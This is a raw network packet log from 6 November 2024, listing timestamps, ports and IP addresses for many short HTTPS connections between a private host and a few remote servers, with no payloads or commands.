Nov 6, 2024 17:03:49.013149023 CET	50255	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.013345003 CET	50255	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.013356924 CET	443	50255	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.044111013 CET	443	50254	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.044725895 CET	50254	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.044751883 CET	443	50254	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.045192957 CET	50254	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.045198917 CET	443	50254	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.048476934 CET	443	50253	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.048927069 CET	50253	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.048957109 CET	443	50253	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.049364090 CET	50253	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.049376965 CET	443	50253	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.109548092 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.109575987 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.109642982 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.109643936 CET	50251	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.109683990 CET	50251	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.109833002 CET	50251	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.109853983 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.109867096 CET	50251	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.109874010 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.112289906 CET	50256	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.112334967 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.112411022 CET	50256	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.112528086 CET	50256	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.112544060 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.161459923 CET	443	50252	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.162206888 CET	50252	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.162237883 CET	443	50252	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.162908077 CET	50252	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.162923098 CET	443	50252	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.174455881 CET	443	50254	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.174513102 CET	443	50254	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.174592972 CET	50254	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.174732924 CET	50254	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.174758911 CET	443	50254	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.174772978 CET	50254	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.174781084 CET	443	50254	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.177576065 CET	50257	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.177608967 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.177697897 CET	50257	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.177849054 CET	50257	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.177860975 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.182138920 CET	443	50253	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.182193041 CET	443	50253	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.182245016 CET	50253	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.182346106 CET	50253	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.182359934 CET	443	50253	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.182372093 CET	50253	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.182377100 CET	443	50253	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.184679031 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.184708118 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.184776068 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.184917927 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.184931993 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.293442011 CET	443	50252	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.293617964 CET	443	50252	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.293698072 CET	50252	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.293806076 CET	50252	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.293833971 CET	443	50252	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.293848038 CET	50252	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.293853998 CET	443	50252	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.296926975 CET	50259	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.296969891 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.297087908 CET	50259	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.297261953 CET	50259	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.297281981 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.746690989 CET	443	50255	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.747208118 CET	50255	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.747246981 CET	443	50255	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.747694969 CET	50255	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.747701883 CET	443	50255	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.837243080 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.837711096 CET	50256	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.837727070 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.838140011 CET	50256	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.838144064 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.885231018 CET	443	50255	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.885458946 CET	443	50255	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.885530949 CET	50255	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.885567904 CET	50255	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.885588884 CET	443	50255	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.885600090 CET	50255	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.885605097 CET	443	50255	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.888484001 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.888514996 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.888606071 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.888766050 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.888781071 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.916467905 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.916960001 CET	50257	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.916990042 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.917393923 CET	50257	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.917399883 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.926556110 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.926855087 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.926867962 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.927220106 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.927225113 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.967647076 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.967700958 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.967756987 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.967782974 CET	50256	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.967813969 CET	50256	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.968040943 CET	50256	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.968050003 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.968060970 CET	50256	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.968065023 CET	443	50256	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.970894098 CET	50261	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.970944881 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.971030951 CET	50261	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.971183062 CET	50261	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.971208096 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.030152082 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.030601025 CET	50259	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.030628920 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.031028032 CET	50259	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.031034946 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.051230907 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.051264048 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.051333904 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.051333904 CET	50257	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.051390886 CET	50257	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.051517963 CET	50257	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.051532984 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.051544905 CET	50257	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.051551104 CET	443	50257	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.054457903 CET	50262	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.054495096 CET	443	50262	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.054557085 CET	50262	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.054742098 CET	50262	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.054758072 CET	443	50262	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.160245895 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.160265923 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.160320044 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.160434961 CET	50259	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.160680056 CET	50259	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.160697937 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.160712004 CET	50259	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.160717964 CET	443	50259	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.163328886 CET	50263	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.163364887 CET	443	50263	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.163439035 CET	50263	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.163645983 CET	50263	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.163659096 CET	443	50263	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.177247047 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.177275896 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.177290916 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.177367926 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.177387953 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.177429914 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.178852081 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.178921938 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.178924084 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.178970098 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.179018974 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.179030895 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.179052114 CET	50258	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.179056883 CET	443	50258	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.181803942 CET	50264	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.181859970 CET	443	50264	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.181962013 CET	50264	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.182102919 CET	50264	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.182116985 CET	443	50264	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.626353979 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.626832962 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.626864910 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.627306938 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.627322912 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.818912983 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.820600986 CET	50261	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.820636034 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.821047068 CET	50261	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.821053982 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.880773067 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.880805016 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.880824089 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.881009102 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.881069899 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.881166935 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.903830051 CET	443	50263	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.904252052 CET	50263	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.904283047 CET	443	50263	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.904723883 CET	50263	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.904730082 CET	443	50263	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.929116964 CET	443	50264	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.929527998 CET	50264	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.929554939 CET	443	50264	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.930155039 CET	50264	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.930160046 CET	443	50264	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.998368025 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.998404026 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.998450041 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.998471022 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.998517990 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.998672009 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.998698950 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:50.998713970 CET	50260	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:50.998719931 CET	443	50260	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.001715899 CET	50265	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.001745939 CET	443	50265	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.001821995 CET	50265	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.001981974 CET	50265	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.001996994 CET	443	50265	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.013169050 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.013200045 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.013258934 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.013257027 CET	50261	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.013299942 CET	50261	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.013465881 CET	50261	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.013483047 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.013516903 CET	50261	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.013523102 CET	443	50261	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.015547037 CET	50266	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.015582085 CET	443	50266	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.015645981 CET	50266	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.015789032 CET	50266	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.015801907 CET	443	50266	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.036948919 CET	443	50263	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.037013054 CET	443	50263	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.037065983 CET	50263	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.037190914 CET	50263	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.037204981 CET	443	50263	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.037216902 CET	50263	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.037221909 CET	443	50263	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.039222956 CET	50267	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.039242983 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.039329052 CET	50267	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.039463997 CET	50267	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.039477110 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.071799994 CET	443	50264	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.071861982 CET	443	50264	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.071912050 CET	50264	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.072036982 CET	50264	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.072056055 CET	443	50264	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.072067022 CET	50264	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.072072983 CET	443	50264	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.074381113 CET	50268	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.074417114 CET	443	50268	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.074470997 CET	50268	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.074620008 CET	50268	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.074635029 CET	443	50268	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.737776995 CET	443	50265	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.738290071 CET	50265	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.738305092 CET	443	50265	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.738780022 CET	50265	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.738786936 CET	443	50265	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.756989002 CET	443	50266	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.757333994 CET	50266	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.757348061 CET	443	50266	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.757734060 CET	50266	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.757740974 CET	443	50266	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.815977097 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.816515923 CET	50267	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.816541910 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.816989899 CET	50267	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.817001104 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.828869104 CET	443	50268	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.829147100 CET	50268	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.829165936 CET	443	50268	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.829530954 CET	50268	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.829540968 CET	443	50268	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.869617939 CET	443	50265	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.873370886 CET	443	50265	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.873460054 CET	50265	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.876159906 CET	50265	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.876179934 CET	443	50265	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.876202106 CET	50265	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.876208067 CET	443	50265	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.879224062 CET	50269	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.879268885 CET	443	50269	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.879355907 CET	50269	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.879471064 CET	50269	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.879487038 CET	443	50269	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.895457029 CET	443	50266	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.895519972 CET	443	50266	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.895570040 CET	50266	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.895735979 CET	50266	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.895752907 CET	443	50266	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.895762920 CET	50266	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.895767927 CET	443	50266	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.898056984 CET	50270	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.898091078 CET	443	50270	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.898161888 CET	50270	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.898310900 CET	50270	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.898324966 CET	443	50270	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.965779066 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.965811968 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.965857983 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.965892076 CET	50267	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.965925932 CET	50267	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.966104031 CET	50267	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.966125965 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.966140032 CET	50267	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.966145039 CET	443	50267	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.968493938 CET	50271	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.968547106 CET	443	50271	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.968632936 CET	50271	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.968774080 CET	50271	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.968790054 CET	443	50271	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.992225885 CET	443	50268	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.992628098 CET	443	50268	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.992686987 CET	50268	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.992721081 CET	50268	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.992733002 CET	443	50268	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:51.992743969 CET	50268	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:51.992748976 CET	443	50268	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.661667109 CET	443	50270	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.662271023 CET	50270	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.662293911 CET	443	50270	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.662815094 CET	50270	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.662818909 CET	443	50270	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.725635052 CET	443	50271	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.726109028 CET	50271	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.726140022 CET	443	50271	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.726551056 CET	50271	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.726556063 CET	443	50271	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.795736074 CET	443	50270	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.795816898 CET	443	50270	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.795866966 CET	50270	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.796058893 CET	50270	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.796072006 CET	443	50270	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.796082020 CET	50270	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.796087027 CET	443	50270	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.857033014 CET	443	50271	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.857384920 CET	443	50271	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.857460976 CET	50271	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.857500076 CET	50271	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.857522011 CET	443	50271	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:52.857539892 CET	50271	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:52.857544899 CET	443	50271	13.107.246.45	192.168.2.6
Nov 6, 2024 17:04:00.798232079 CET	80	56897	193.122.6.168	192.168.2.6
Nov 6, 2024 17:04:00.798304081 CET	56897	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:04:06.367171049 CET	56795	80	192.168.2.6	2.16.100.168
Nov 6, 2024 17:04:06.367506027 CET	56793	443	192.168.2.6	40.126.31.73
Nov 6, 2024 17:04:06.373258114 CET	80	56795	2.16.100.168	192.168.2.6
Nov 6, 2024 17:04:06.373303890 CET	56795	80	192.168.2.6	2.16.100.168
Nov 6, 2024 17:04:06.373689890 CET	443	56793	40.126.31.73	192.168.2.6
Nov 6, 2024 17:04:06.373734951 CET	56793	443	192.168.2.6	40.126.31.73
